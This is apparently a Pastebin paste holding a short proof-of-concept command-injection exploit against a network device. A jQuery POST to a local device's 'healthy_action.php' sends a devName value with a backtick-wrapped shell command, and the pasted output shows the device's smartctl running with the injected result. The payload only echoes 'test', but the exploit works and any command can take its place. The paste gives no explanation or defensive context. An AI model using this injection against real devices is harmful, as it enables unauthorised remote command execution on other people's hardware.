Advertisement
Guest User

Untitled

a guest
Oct 20th, 2014
168
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.59 KB | None | 0 0
  1. $.ajax({
  2. type:"POST",
  3. url: 'http://192.168.1.69/action/healthy_action.php',
  4. cache: false,
  5. data: "devName=/dev/s`echo test`",
  6. success:function(data){
  7. console.log(data)
  8. }
  9. })
  10.  
  11. Output:
  12. XMLHttpRequest { onreadystatechange: null, readyState: 1, timeout: 0, withCredentials: false, upload: XMLHttpRequestUpload, status: 0, statusText: "", responseType: "", response: "", responseText: "" }
  13. "smartctl version 5.36 [arm-marvell-linux-gnueabi] Copyright (C) 2002-6 Bruce Allen
  14. Home page is http://smartmontools.sourceforge.net/
  15.  
  16. Smartctl open device: /dev/stest failed: No such file or directory
  17. "
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement